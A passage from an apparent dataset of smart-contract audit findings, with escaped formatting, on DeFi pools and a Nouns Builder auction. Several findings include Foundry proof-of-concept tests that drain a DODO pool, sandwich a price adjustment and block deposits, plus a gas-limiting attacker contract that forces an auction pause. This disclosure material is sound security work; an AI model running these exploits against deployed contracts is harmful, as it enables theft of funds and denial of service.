balTotalSupply;\\n\\n\\n balances[i] = polBalance;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nTo value each LP token the contract divides the valuation of the pool by the total supply of LP. This in itself is correct, however the totalSupply method for a variety of Balancer pools doesn't accurately reflect the true LP supply. If we take a look at a few Balancer pools we can quickly see the issue:\\nThis pool shows a max supply of 2,596,148,429,273,858 whereas the actual supply is 6454.48. In this case the LP token would be significantly undervalued. If a sizable portion of the reserves are deployed in an affected pool the backing per OHM would appear to the RBS system to be much lower than it really is. As a result it can cause the RBS to deploy its funding incorrectly, potentially selling/buying at a large loss to the protocol.чUse a try-catch block to always query getActualSupply on each pool to make sure supported pools use the correct metric.чPool LP can be grossly under/over valuedч```\\nuint256 balTotalSupply = pool.balancerPool.totalSupply();\\nuint256[] memory balances = new uint256[](_vaultTokens.length);\\n// Calculate the proportion of the pool balances owned by the polManager\\nif (balTotalSupply != 0) {\\n // Calculate the amount of OHM in the pool owned by the polManager\\n // We have to iterate through the tokens array to find the index of OHM\\n uint256 tokenLen = _vaultTokens.length;\\n for (uint256 i; i < tokenLen; ) {\\n uint256 balance = _vaultBalances[i];\\n uint256 polBalance = (balance * balBalance) / balTotalSupply;\\n\\n\\n balances[i] = polBalance;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n -Possible incorrect price for tokens in Balancer stable pool due to amplification parameter updateчmediumчIncorrect price calculation of tokens in StablePools if amplification factor is being updated\\nThe amplification parameter used to calculate the invariant can be in a state of update. In such a case, the current amplification parameter can differ from the amplificaiton parameter at the time of the last invariant calculation. The current implementaiton of `getTokenPriceFromStablePool` doesn't consider this and always uses the amplification factor obtained by calling `getLastInvariant`\\n```\\n function getTokenPriceFromStablePool(\\n address lookupToken_,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n\\n // rest of code..\\n\\n try pool.getLastInvariant() returns (uint256, uint256 ampFactor) {\\n \\n // @audit the amplification factor as of the last invariant calculation is used\\n lookupTokensPerDestinationToken = StableMath._calcOutGivenIn(\\n ampFactor,\\n balances_,\\n destinationTokenIndex,\\n lookupTokenIndex,\\n 1e18,\\n StableMath._calculateInvariant(ampFactor, balances_) // Sometimes the fetched invariant value does not work, so calculate it\\n );\\n```\\n\\n```\\n // @audit the amplification parameter can be updated\\n function startAmplificationParameterUpdate(uint256 rawEndValue, uint256 endTime) external authenticate {\\n\\n // @audit for calculating the invariant the current amplification factor is obtained by calling _getAmplificationParameter()\\n function _onSwapGivenIn(\\n SwapRequest memory swapRequest,\\n uint256[] memory balances,\\n uint256 indexIn,\\n uint256 indexOut\\n ) internal virtual override whenNotPaused returns (uint256) {\\n (uint256 currentAmp, ) = _getAmplificationParameter();\\n uint256 amountOut = StableMath._calcOutGivenIn(currentAmp, balances, indexIn, indexOut, swapRequest.amount);\\n return amountOut;\\n }\\n```\\nчUse the latest amplification factor by callling the `getAmplificationParameter` functionчIn case the amplification parameter of a pool is being updated by the admin, wrong price will be calculated.ч```\\n function getTokenPriceFromStablePool(\\n address lookupToken_,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n\\n // rest of code..\\n\\n try pool.getLastInvariant() returns (uint256, uint256 ampFactor) {\\n \\n // @audit the amplification factor as of the last invariant calculation is used\\n lookupTokensPerDestinationToken = StableMath._calcOutGivenIn(\\n ampFactor,\\n balances_,\\n destinationTokenIndex,\\n lookupTokenIndex,\\n 1e18,\\n StableMath._calculateInvariant(ampFactor, balances_) // Sometimes the fetched invariant value does not work, so calculate it\\n );\\n```\\n -Incorrect deviation calculation in isDeviatingWithBpsCheck functionчmediumчThe current implementation of the `isDeviatingWithBpsCheck` function in the codebase leads to inaccurate deviation calculations, potentially allowing deviations beyond the specified limits.\\nThe function `isDeviatingWithBpsCheck` checks if the deviation between two values exceeds a defined threshold. This function incorrectly calculates the deviation, considering only the deviation from the larger value to the smaller one, instead of the deviation from the mean (or TWAP).\\n```\\n function isDeviatingWithBpsCheck(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n if (deviationBps_ > deviationMax_)\\n revert Deviation_InvalidDeviationBps(deviationBps_, deviationMax_);\\n\\n return isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n\\n function isDeviating(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n return\\n (value0_ < value1_)\\n ? _isDeviating(value1_, value0_, deviationBps_, deviationMax_)\\n : _isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n```\\n\\nThe function then call `_isDeviating` to calculate how much the smaller value is deviated from the bigger value.\\n```\\n function _isDeviating(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n return ((value0_ - value1_) * deviationMax_) / value0_ > deviationBps_;\\n }\\n```\\n\\nThe function `isDeviatingWithBpsCheck` is usually used to check how much the current value is deviated from the TWAP value to make sure that the value is not manipulated. Such as spot price and twap price in UniswapV3.\\n```\\n if (\\n // `isDeviatingWithBpsCheck()` will revert if `deviationBps` is invalid.\\n Deviation.isDeviatingWithBpsCheck(\\n baseInQuotePrice,\\n baseInQuoteTWAP,\\n params.maxDeviationBps,\\n DEVIATION_BASE\\n )\\n ) {\\n revert UniswapV3_PriceMismatch(address(params.pool), baseInQuoteTWAP, baseInQuotePrice);\\n }\\n```\\n\\nThe issue is isDeviatingWithBpsCheck is not check the deviation of current value to the TWAP but deviation from the bigger value to the smaller value. This leads to an incorrect allowance range for the price, permitting deviations that exceed the acceptable threshold.\\nExample:\\nTWAP price: 1000 Allow deviation: 10%.\\nThe correct deviation calculation will use deviation from the mean. The allow price will be from 900 to 1100 since:\\n|1100 - 1000| / 1000 = 10%\\n|900 - 1000| / 1000 = 10%\\nHowever the current calculation will allow the price from 900 to 1111\\n(1111 - 1000) / 1111 = 10%\\n(1000 - 900) / 1000 = 10%\\nEven though the actual deviation of 1111 to 1000 is |1111 - 1000| / 1000 = 11.11% > 10%чTo accurately measure deviation, the isDeviating function should be revised to calculate the deviation based on the mean value: `| spot value - twap value | / twap value`.чThis miscalculation allows for greater deviations than intended, increasing the vulnerability to price manipulation and inaccuracies in Oracle price reporting.ч```\\n function isDeviatingWithBpsCheck(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n if (deviationBps_ > deviationMax_)\\n revert Deviation_InvalidDeviationBps(deviationBps_, deviationMax_);\\n\\n return isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n\\n function isDeviating(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n return\\n (value0_ < value1_)\\n ? _isDeviating(value1_, value0_, deviationBps_, deviationMax_)\\n : _isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n```\\n -Pool can be drained if there are no LP_FEESчhighчThe pool can be depleted because swaps allow the withdrawal of the entire balance, resulting in a reserve of 0 for a specific asset. When an asset's balance reaches 0, the PMMPricing algorithm incorrectly estimates the calculation of output amounts. Consequently, the entire pool can be exploited using a flash loan by depleting one of the tokens to 0 and then swapping back to the pool whatever is received.\\nFirstly, as indicated in the summary, selling quote/base tokens can lead to draining the opposite token in the pool, potentially resulting in a reserve of 0. Consequently, the swapping mechanism permits someone to entirely deplete the token balance within the pool. In such cases, the calculations within the pool mechanism become inaccurate. Therefore, swapping back to whatever has been initially purchased will result in acquiring more tokens, further exacerbating the depletion of the pool.\\nAllow me to provide a PoC to illustrate this scenario:\\n```\\nfunction test_poolCanBeDrained() public {\\n // @review 99959990000000000000000 this amount makes the reserve 0\\n // run a fuzz test, to get the logs easily I will just use this value as constant but I found it via fuzzing\\n // selling this amount to the pool will make the quote token reserves \"0\".\\n vm.startPrank(tapir);\\n uint256 _amount = 99959990000000000000000;\\n\\n // Buy shares with tapir, 10 - 10 initiate the pool\\n dai.transfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // make sure the values are correct with my math\\n assertTrue(gsp._BASE_RESERVE_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_RESERVE_() == 10 * 1e6);\\n assertTrue(gsp._BASE_TARGET_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_TARGET_() == 10 * 1e6);\\n assertEq(gsp.balanceOf(tapir), 10 * 1e18);\\n vm.stopPrank();\\n \\n // sell such a base token amount such that the quote reserve is 0\\n // I calculated the \"_amount\" already which will make the quote token reserve \"0\"\\n vm.startPrank(hippo);\\n deal(DAI, hippo, _amount);\\n dai.transfer(address(gsp), _amount);\\n uint256 receivedQuoteAmount = gsp.sellBase(hippo);\\n\\n // print the reserves and the amount received by hippo when he sold the base tokens\\n console.log(\"Received quote amount by hippo\", receivedQuoteAmount);\\n console.log(\"Base reserve\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve\", gsp._QUOTE_RESERVE_());\\n\\n // Quote reserve is 0!!! That means the pool has 0 assets, basically pool has only one asset now!\\n // this behaviour is almost always not a desired behaviour because we never want our assets to be 0 \\n // as a result of swapping or removing liquidity.\\n assertEq(gsp._QUOTE_RESERVE_(), 0);\\n\\n // sell the quote tokens received back to the pool immediately\\n usdc.transfer(address(gsp), receivedQuoteAmount);\\n\\n // cache whatever received base tokens from the selling back\\n uint256 receivedBaseAmount = gsp.sellQuote(hippo);\\n\\n console.log(\"Received base amount by hippo\", receivedBaseAmount);\\n console.log(\"Base target\", gsp._BASE_TARGET_());\\n console.log(\"Quote target\", gsp._QUOTE_TARGET_());\\n console.log(\"Base reserve\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve\", gsp._QUOTE_RESERVE_());\\n \\n // whatever received in base tokens are bigger than our first flashloan! \\n // means that we have a profit!\\n assertGe(receivedBaseAmount, _amount);\\n console.log(\"Profit for attack\", receivedBaseAmount - _amount);\\n }\\n```\\n\\nTest results and logs:чDo not allow the pools balance to be 0 or do not let LP_FEE to be 0 in anytime.чPool can be drained, funds are lost. Hence, high. Though, this can only happen when there are no \"LP_FEES\". However, when we check the default settings of the deployment, we see here that the LP_FEE is set to 0. So, it is ok to assume that the LP_FEES can be 0.ч```\\nfunction test_poolCanBeDrained() public {\\n // @review 99959990000000000000000 this amount makes the reserve 0\\n // run a fuzz test, to get the logs easily I will just use this value as constant but I found it via fuzzing\\n // selling this amount to the pool will make the quote token reserves \"0\".\\n vm.startPrank(tapir);\\n uint256 _amount = 99959990000000000000000;\\n\\n // Buy shares with tapir, 10 - 10 initiate the pool\\n dai.transfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // make sure the values are correct with my math\\n assertTrue(gsp._BASE_RESERVE_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_RESERVE_() == 10 * 1e6);\\n assertTrue(gsp._BASE_TARGET_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_TARGET_() == 10 * 1e6);\\n assertEq(gsp.balanceOf(tapir), 10 * 1e18);\\n vm.stopPrank();\\n \\n // sell such a base token amount such that the quote reserve is 0\\n // I calculated the \"_amount\" already which will make the quote token reserve \"0\"\\n vm.startPrank(hippo);\\n deal(DAI, hippo, _amount);\\n dai.transfer(address(gsp), _amount);\\n uint256 receivedQuoteAmount = gsp.sellBase(hippo);\\n\\n // print the reserves and the amount received by hippo when he sold the base tokens\\n console.log(\"Received quote amount by hippo\", receivedQuoteAmount);\\n console.log(\"Base reserve\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve\", gsp._QUOTE_RESERVE_());\\n\\n // Quote reserve is 0!!! That means the pool has 0 assets, basically pool has only one asset now!\\n // this behaviour is almost always not a desired behaviour because we never want our assets to be 0 \\n // as a result of swapping or removing liquidity.\\n assertEq(gsp._QUOTE_RESERVE_(), 0);\\n\\n // sell the quote tokens received back to the pool immediately\\n usdc.transfer(address(gsp), receivedQuoteAmount);\\n\\n // cache whatever received base tokens from the selling back\\n uint256 receivedBaseAmount = gsp.sellQuote(hippo);\\n\\n console.log(\"Received base amount by hippo\", receivedBaseAmount);\\n console.log(\"Base target\", gsp._BASE_TARGET_());\\n console.log(\"Quote target\", gsp._QUOTE_TARGET_());\\n console.log(\"Base reserve\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve\", gsp._QUOTE_RESERVE_());\\n \\n // whatever received in base tokens are bigger than our first flashloan! \\n // means that we have a profit!\\n assertGe(receivedBaseAmount, _amount);\\n console.log(\"Profit for attack\", receivedBaseAmount - _amount);\\n }\\n```\\n -Adjusting \"_I_\" will create a sandwich opportunity because of price changesчmediumчAdjusting the value of \"I\" directly influences the price. This can be exploited by a MEV bot, simply by trading just before the \"adjustPrice\" function and exiting right after the price change. The profit gained from this operation essentially represents potential losses for the liquidity providers who supplied liquidity to the pool.\\nAs we can see in the docs, the \"I\" is the \"i\" value in here and it is directly related with the output amount a trader will receive when selling a quote/base token:\\nSince the price will change, the MEV bot can simply sandwich the tx. Here an example how it can be executed by a MEV bot:\\n```\\nfunction test_Adjusting_I_CanBeFrontrunned() external {\\n vm.startPrank(tapir);\\n\\n // Buy shares with tapir, 10 - 10\\n dai.safeTransfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // print some stuff\\n console.log(\"Base target initial\", gsp._BASE_TARGET_());\\n console.log(\"Quote target initial\", gsp._QUOTE_TARGET_());\\n console.log(\"Base reserve initial\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve initial\", gsp._QUOTE_RESERVE_());\\n \\n // we know the price will decrease so lets sell the base token before that\\n uint256 initialBaseTokensSwapped = 5 * 1e18;\\n\\n // sell the base tokens before adjustPrice\\n dai.safeTransfer(address(gsp), initialBaseTokensSwapped);\\n uint256 receivedQuoteTokens = gsp.sellBase(tapir);\\n vm.stopPrank();\\n\\n // this is the tx will be sandwiched by the MEV trader\\n vm.prank(MAINTAINER);\\n gsp.adjustPrice(999000);\\n\\n // quickly resell whatever gained by the price update\\n vm.startPrank(tapir);\\n usdc.safeTransfer(address(gsp), receivedQuoteTokens);\\n uint256 receivedBaseTokens = gsp.sellQuote(tapir);\\n console.log(\"Base target\", gsp._BASE_TARGET_());\\n console.log(\"Quote target\", gsp._QUOTE_TARGET_());\\n console.log(\"Base reserve\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve\", gsp._QUOTE_RESERVE_());\\n console.log(\"Received base tokens\", receivedBaseTokens);\\n\\n // NOTE: the LP fee and MT FEE is set for this example, so this is not an rough assumption\\n // where fees are 0. Here the fees set for both of the values (default values):\\n // uint256 constant LP_FEE_RATE = 10000000000000;\\n // uint256 constant MT_FEE_RATE = 10000000000000;\\n\\n // whatever we get is more than we started, in this example\\n // MEV trader started 5 DAI and we have more than 5 DAI!!\\n assertGe(receivedBaseTokens, initialBaseTokensSwapped);\\n }\\n```\\n\\nTest result and logs:\\nAfter the sandwich, we can see that the MEV bot's DAI amount exceeds its initial DAI balance (profits). Additionally, the reserves for both base and quote tokens are less than the initial 10 tokens deposited by the tapir (only LP). The profit gained by the MEV bot essentially translates to a loss for the tapir.\\nAnother note on this is that even though the `adjustPrice` called by MAINTAINER without getting frontrunned, it still creates a big price difference which requires immediate arbitrages. Usually these type of parameter changes that impacts the trades are setted by time via ramping to mitigate the unfair advantages that it can occur during the price update.чAcknowledge the issue and use private RPC's to eliminate front-running or slowly ramp up the \"I\" so that the arbitrage opportunity is fairчч```\\nfunction test_Adjusting_I_CanBeFrontrunned() external {\\n vm.startPrank(tapir);\\n\\n // Buy shares with tapir, 10 - 10\\n dai.safeTransfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // print some stuff\\n console.log(\"Base target initial\", gsp._BASE_TARGET_());\\n console.log(\"Quote target initial\", gsp._QUOTE_TARGET_());\\n console.log(\"Base reserve initial\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve initial\", gsp._QUOTE_RESERVE_());\\n \\n // we know the price will decrease so lets sell the base token before that\\n uint256 initialBaseTokensSwapped = 5 * 1e18;\\n\\n // sell the base tokens before adjustPrice\\n dai.safeTransfer(address(gsp), initialBaseTokensSwapped);\\n uint256 receivedQuoteTokens = gsp.sellBase(tapir);\\n vm.stopPrank();\\n\\n // this is the tx will be sandwiched by the MEV trader\\n vm.prank(MAINTAINER);\\n gsp.adjustPrice(999000);\\n\\n // quickly resell whatever gained by the price update\\n vm.startPrank(tapir);\\n usdc.safeTransfer(address(gsp), receivedQuoteTokens);\\n uint256 receivedBaseTokens = gsp.sellQuote(tapir);\\n console.log(\"Base target\", gsp._BASE_TARGET_());\\n console.log(\"Quote target\", gsp._QUOTE_TARGET_());\\n console.log(\"Base reserve\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve\", gsp._QUOTE_RESERVE_());\\n console.log(\"Received base tokens\", receivedBaseTokens);\\n\\n // NOTE: the LP fee and MT FEE is set for this example, so this is not an rough assumption\\n // where fees are 0. Here the fees set for both of the values (default values):\\n // uint256 constant LP_FEE_RATE = 10000000000000;\\n // uint256 constant MT_FEE_RATE = 10000000000000;\\n\\n // whatever we get is more than we started, in this example\\n // MEV trader started 5 DAI and we have more than 5 DAI!!\\n assertGe(receivedBaseTokens, initialBaseTokensSwapped);\\n }\\n```\\n -First depositor can lock the quote target value to zeroчmediumчWhen the initial deposit occurs, it is possible for the quote target to be set to 0. This situation significantly impacts other LPs as well. Even if subsequent LPs deposit substantial amounts, the quote target remains at 0 due to multiplication with this zero value. 0 QUOTE_TARGET value will impact the swaps that pool facilities\\nWhen the first deposit happens, QUOTE_TARGET is set as follows:\\n```\\n if (totalSupply == 0) {\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_)\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance;\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n _QUOTE_TARGET_ = uint112(DecimalMath.mulFloor(shares, _I_));\\n```\\n\\nIn this scenario, the 'shares' value can be a minimum of 1e3, as indicated here: link to code snippet.\\nThis implies that if someone deposits minuscule amounts of quote token and base token, they can set the QUOTE_TARGET to zero because the `mulFloor` operation uses a scaling factor of 1e18:\\n```\\nfunction mulFloor(uint256 target, uint256 d) internal pure returns (uint256) {\\n return target * d / (10 ** 18);\\n }\\n```\\n\\n```\\n// @review 0 + (0 * something) = 0! doesn't matter what amount has been deposited !\\n_QUOTE_TARGET_ = uint112(uint256(_QUOTE_TARGET_) + (DecimalMath.mulFloor(uint256(_QUOTE_TARGET_), mintRatio)));\\n```\\n\\nHere a PoC shows that if the first deposit is tiny the QUOTE_TARGET is 0. Also, whatever deposits after goes through the QUOTE_TARGET still 0 because of the multiplication with 0!\\n```\\nfunction test_StartWithZeroTarget() external {\\n // tapir deposits tiny amounts to make quote target 0\\n vm.startPrank(tapir);\\n dai.safeTransfer(address(gsp), 1 * 1e5);\\n usdc.transfer(address(gsp), 1 * 1e5);\\n gsp.buyShares(tapir);\\n\\n console.log(\"Base target\", gsp._BASE_TARGET_());\\n console.log(\"Quote target\", gsp._QUOTE_TARGET_());\\n console.log(\"Base reserve\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve\", gsp._QUOTE_RESERVE_());\\n\\n // quote target is indeed 0!\\n assertEq(gsp._QUOTE_TARGET_(), 0);\\n\\n vm.stopPrank();\\n\\n // hippo deposits properly\\n vm.startPrank(hippo);\\n dai.safeTransfer(address(gsp), 1000 * 1e18);\\n usdc.transfer(address(gsp), 10000 * 1e6);\\n gsp.buyShares(hippo);\\n\\n console.log(\"Base target\", gsp._BASE_TARGET_());\\n console.log(\"Quote target\", gsp._QUOTE_TARGET_());\\n console.log(\"Base reserve\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve\", gsp._QUOTE_RESERVE_());\\n\\n // although hippo deposited 1000 USDC as quote tokens, target is still 0 due to multiplication with 0\\n assertEq(gsp._QUOTE_TARGET_(), 0);\\n }\\n```\\n\\nTest result and logs:чAccording to the quote tokens decimals, multiply the quote token balance with the proper decimal scalor.чSince the quote target is important and used when pool deciding the swap math I will label this as high.ч```\\n if (totalSupply == 0) {\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_)\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance;\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n _QUOTE_TARGET_ = uint112(DecimalMath.mulFloor(shares, _I_));\\n```\\n -Share Price Inflation by First LP-er, Enabling DOS Attacks on Subsequent buyShares with Up to 1001x the Attacking CostчmediumчThe smart contract contains a critical vulnerability that allows a malicious actor to manipulate the share price during the initialization of the liquidity pool, potentially leading to a DOS attack on subsequent buyShares operations.\\nThe root cause of the vulnerability lies in the initialization process of the liquidity pool, specifically in the calculation of shares during the first deposit.\\n```\\n// Findings are labeled with '<= FOUND'\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_) // <= FOUND\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance; // @audit-info mint shares based on min balance(base, quote)\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n // rest of code\\n }\\n```\\n\\nIf the pool is empty, the smart contract directly sets the share value based on the minimium value of the base token denominated value of the provided assets. This assumption can be manipulated by a malicious actor during the first deposit, leading to a situation where the LP pool token becomes extremely expensive.\\nAttack Scenario\\nThe attacker exploits the vulnerability during the initialization of the liquidity pool:\\nThe attacker mints 1001 `shares` during the first deposit.\\nImmediately, the attacker sells back 1000 `shares`, ensuring to keep 1 wei via the `sellShares` function.\\nThe attacker then donates a large amount (1000e18) of base and quote tokens and invokes the `sync()` routine to pump the base and quote reserves to 1001 + 1000e18.\\nThe protocol users proceed to execute the `buyShares` function with a balance less than `attacker's spending * 1001`. The transaction reverts due to the `mintRatio` being kept below 1001 wad and the computed `shares` less than 1001 (line 71), while it needs a value >= 1001 to mint `shares` successfully.\\n```\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n // case 2. normal case\\n uint256 baseInputRatio = DecimalMath.divFloor(baseInput, baseReserve);\\n uint256 quoteInputRatio = DecimalMath.divFloor(quoteInput, quoteReserve);\\n uint256 mintRatio = quoteInputRatio < baseInputRatio ? quoteInputRatio : baseInputRatio; // <= FOUND: mintRatio below 1001wad if input amount smaller than reserves * 1001\\n // The shares will be minted to user\\n shares = DecimalMath.mulFloor(totalSupply, mintRatio); // <= FOUND: the manipulated totalSupply of 1wei requires a mintRatio of greater than 1000 for a successful _mint()\\n // rest of code\\n }\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPVault.sol\\n function _mint(address user, uint256 value) internal {\\n require(value > 1000, \"MINT_AMOUNT_NOT_ENOUGH\"); // <= FOUND: next buyShares with volume less than 1001 x attacker balance will revert here\\n// rest of code\\n }\\n```\\n\\nThe `_mint()` function fails with a \"MINT_AMOUNT_NOT_ENOUGH\" error, causing a denial-of-service condition for subsequent buyShares operations.\\nPOC\\n```\\n// File: dodo-gassaving-pool/test/GPSTrader.t.sol\\n function test_mint1weiShares_DOSx1000DonationVolume() public {\\n GSP gspTest = new GSP();\\n gspTest.init(\\n MAINTAINER,\\n address(mockBaseToken),\\n address(mockQuoteToken),\\n 0,\\n 0,\\n 1000000,\\n 500000000000000,\\n false\\n );\\n\\n // Buy 1001 shares\\n vm.startPrank(USER);\\n mockBaseToken.transfer(address(gspTest), 1001);\\n mockQuoteToken.transfer(address(gspTest), 1001 * gspTest._I_() / 1e18);\\n gspTest.buyShares(USER);\\n assertEq(gspTest.balanceOf(USER), 1001);\\n\\n // User sells shares and keep ONLY 1wei\\n gspTest.sellShares(1000, USER, 0, 0, \"\", block.timestamp);\\n assertEq(gspTest.balanceOf(USER), 1);\\n\\n // User donate a huge amount of base & quote tokens to inflate the share price\\n uint256 donationAmount = 1000e18;\\n mockBaseToken.transfer(address(gspTest), donationAmount);\\n mockQuoteToken.transfer(address(gspTest), donationAmount * gspTest._I_() / 1e18);\\n gspTest.sync();\\n vm.stopPrank();\\n\\n // DOS subsequent operations with roughly 1001 x donation volume\\n uint256 dosAmount = donationAmount * 1001;\\n mockBaseToken.mint(OTHER, type(uint256).max);\\n mockQuoteToken.mint(OTHER, type(uint256).max);\\n\\n vm.startPrank(OTHER);\\n mockBaseToken.transfer(address(gspTest), dosAmount);\\n mockQuoteToken.transfer(address(gspTest), dosAmount * gspTest._I_() / 1e18);\\n\\n vm.expectRevert(\"MINT_AMOUNT_NOT_ENOUGH\");\\n gspTest.buyShares(OTHER);\\n vm.stopPrank();\\n }\\n```\\n\\nA PASS result would confirm that any deposits with volume less than 1001 times to attacker cost would fail. That means by spending $1000, the attacker can DOS any transaction with volume below $1001,000.чA mechanism should be implemented to handle the case of zero totalSupply during initialization. A potential solution is inspired by Uniswap V2 Core Code, which sends the first 1001 LP tokens to the zero address. This way, it's extremely costly to inflate the share price as much as 1001 times on the first deposit.\\n```\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n if (totalSupply == 0) {\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_)\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance; \\n+ _mint(address(0), 1001); // permanently lock the first MINIMUM_LIQUIDITY of 1001 tokens, makes it imposible to manipulate the totalSupply to 1 wei\\n// rest of code\\n``` // rest of code\\n```\\nчThe impact of this vulnerability is severe, as it allows an attacker to conduct DOS attacks on buyShares with a low attacking cost (retrievable for further attacks via sellShares). This significantly impairs the core functionality of the protocol, potentially preventing further LP operations and hindering the protocol's ability to attract Total Value Locked (TVL) for other trading operations such as sellBase, sellQuote and flashloan.ч```\\n// Findings are labeled with '<= FOUND'\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_) // <= FOUND\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance; // @audit-info mint shares based on min balance(base, quote)\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n // rest of code\\n }\\n```\\n -Attacker can force pause the Auction contract.чmediumчIn certain situations (e.g founders have ownership percentage greater than 51) an attacker can potentially exploit the `try catch` within the `Auction._CreateAuction()` function to arbitrarily pause the auction contract.\\nConsider the code from `Auction._CreateAuction()` function, which is called by `Auction.settleCurrentAndCreateNewAuction()`. It first tries to mint a new token for the auction, and if the minting fails the `catch` branch will be triggered, pausing the auction.\\n```\\nfunction _createAuction() private returns (bool) {\\n // Get the next token available for bidding\\n try token.mint() returns (uint256 tokenId) {\\n // Store the token id\\n auction.tokenId = tokenId;\\n\\n // Cache the current timestamp\\n uint256 startTime = block.timestamp;\\n\\n // Used to store the auction end time\\n uint256 endTime;\\n\\n // Cannot realistically overflow\\n unchecked {\\n // Compute the auction end time\\n endTime = startTime + settings.duration;\\n }\\n\\n // Store the auction start and end time\\n auction.startTime = uint40(startTime);\\n auction.endTime = uint40(endTime);\\n\\n // Reset data from the previous auction\\n auction.highestBid = 0;\\n auction.highestBidder = address(0);\\n auction.settled = false;\\n\\n // Reset referral from the previous auction\\n currentBidReferral = address(0);\\n\\n emit AuctionCreated(tokenId, startTime, endTime);\\n return true;\\n } catch {\\n // Pause the contract if token minting failed\\n _pause();\\n return false;\\n }\\n}\\n```\\n\\nDue to the internal logic of the `mint` function, if there are founders with high ownership percentages, many tokens can be minted to them during calls to mintas part of the vesting mechanism. As a consequence of this under some circumstances calls to `mint` can consume huge amounts of gas.\\nCurrently on Ethereum and EVM-compatible chains, calls can consume at most 63/64 of the parent's call gas (See EIP-150). An attacker can exploit this circumstances of high gas cost to restrict the parent gas call limit, making `token.mint()` fail and still leaving enough gas left (1/64) for the `_pause()` call to succeed. Therefore he is able to force the pausing of the auction contract at will.\\nBased on the gas requirements (1/64 of the gas calls has to be enough for `_pause()` gas cost of 21572), then `token.mint()` will need to consume at least 1359036 gas (63 * 21572), consequently it is only possible on some situations like founders with high percentage of vesting, for example 51 or more.\\nConsider the following POC. Here we are using another contract to restrict the gas limit of the call, but this can also be done with an EOA call from the attacker.\\nExploit contract code:\\n```\\npragma solidity ^0.8.16;\\n\\ncontract Attacker {\\n function forcePause(address target) external {\\n bytes4 selector = bytes4(keccak256(\"settleCurrentAndCreateNewAuction()\"));\\n assembly {\\n let ptr := mload(0x40)\\n mstore(ptr,selector)\\n let success := call(1500000, target, 0, ptr, 4, 0, 0)\\n }\\n }\\n}\\n```\\n\\nPOC:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.16;\\n\\nimport { NounsBuilderTest } from \"./utils/NounsBuilderTest.sol\";\\nimport { MockERC721 } from \"./utils/mocks/MockERC721.sol\";\\nimport { MockImpl } from \"./utils/mocks/MockImpl.sol\";\\nimport { MockPartialTokenImpl } from 